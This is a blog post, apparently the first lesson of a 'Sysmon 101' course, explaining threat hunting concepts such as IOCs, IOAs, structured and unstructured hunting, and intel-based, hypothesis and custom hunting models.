loader
  • Subject-matter expert for interconnecting the nodes
  • HomeSysmon 101 – What Is Threat Hunting?

Sysmon 101 – What Is Threat Hunting?

CybersecuritySOC
Amir Hossein Tangsirinezhad
2 Comments

In the Sysmon 101 course, we teach Sysmon tool from basic to advanced and This is the first part of the Sysmon 101 training course. In this part, we are going to talk about Threat Hunting.

WWhat Is Threat Hunting?

The concept of threat hunting refers to the process by which we seek to detect and identify threats that may not exist in our organization, but we must always analyze our environment to identify threats to prevent problems

What Is a Threat?

Threat refers to a variety of attacks and risks that can harm the organization and the assets of an organization. Examples of Threats include:

  •  Ransomware
  • Malware
  • DDOS & DOS Attack
  • Phishing Attack
  • , etc…

What are You Hunting For?

Network Artifact – such as Malware Network Connections, C&C Server Information, etc…

Host Artifacts – such as DLL file, hash values, windows registry key, etc…

Indicator Of Compromise (IOC) – Factors that help identify a threat or an attack, such as forensic data and log files

Indicator Of Attack (IOA) – This is very similar to the IOC but with the difference that it is for understanding attacks

What Type Of Threat Hunting?

There are different types of threat hunting and we want to talk about each type of threat hunting.

Type 1Structured Hunting

Structured Hunting is one of the simplest types of threat hunting. In this type of threat hunting, we can identify and prevent an attack before it occurs. In this type of threat hunting, IOAs and TTP are used to identify and prevent threats.

Type 2Unstructured Hunting

An unstructured hunt is initiated based on a trigger, this trigger can be an Indicator of Compromise (IOC). When a trigger is notified, the threat hunter usually looks for and analyses pre and post-detection patterns to identify the attack

Threat Hunting Model

Threat hunting can be implemented in different models. In this section, we talk about threat hunting models

1 Intel-Based Model

In this Model, threat hunters use IOCs to identify and hunt threats … IOCs related to attacks, which include IP address, domain name, hash values, file path, file name, and registry paths.

threat hunters send this artifact into the SIEM as structured threat information expression (STIX) and trusted automated exchange of intelligence information (TAXII).

 

2 Hypothesis Hunting Model

In this model of threat hunting, we use threat hunting libraries such as MITRE ATTACK and other threat hunting components such as PlayBooks and IOAs, and TTP that have been released for attacks. Based on the environment in which we are supposed to identify threats, we use the above and identify malicious behaviors.

3 Custom Hunting Model

This model is based on situational awareness and industry-based hunting methods. It identifies anomalies in the SIEM and EDR tools and is customizable based on customer requirements.

2 Comment

  1. Pingback: Sysmon 101 - Sysmon Events ID For Threat Hunting - SMEnode
  2. Pingback: What Is Mnaged Detection and Response (MDR)? - SMEnode

Leave a Reply

Your email address will not be published. Required fields are marked *

Recent Posts

Recent Comments

Archives

Categories

Elissa Garlin

Think of a news blog that’s filled with content hourly on the day of going live.

Recent Posts

Categories

Tags

BGP EVPN Broadcast CCIE CCIE DC CCNP cisco Clos network CyberSecurity Data Center datacenter DC Exchange GNU/Linux Incident Response InfoSec IS-IS Kali Layer 2 Connectivity Layer 2 Technologies linus torvalds Linux linux bash linux basic commands linux commands Linux file structure Linux file system linux path linux tutorial lpic1 lpic1 linux Multitenancy Network Network Virtualization Overlay Nexus NVO NX-OS NXOS Overlay shell Underlay Unicast Virtual eXtensible LAN VNI VTEP VXLAN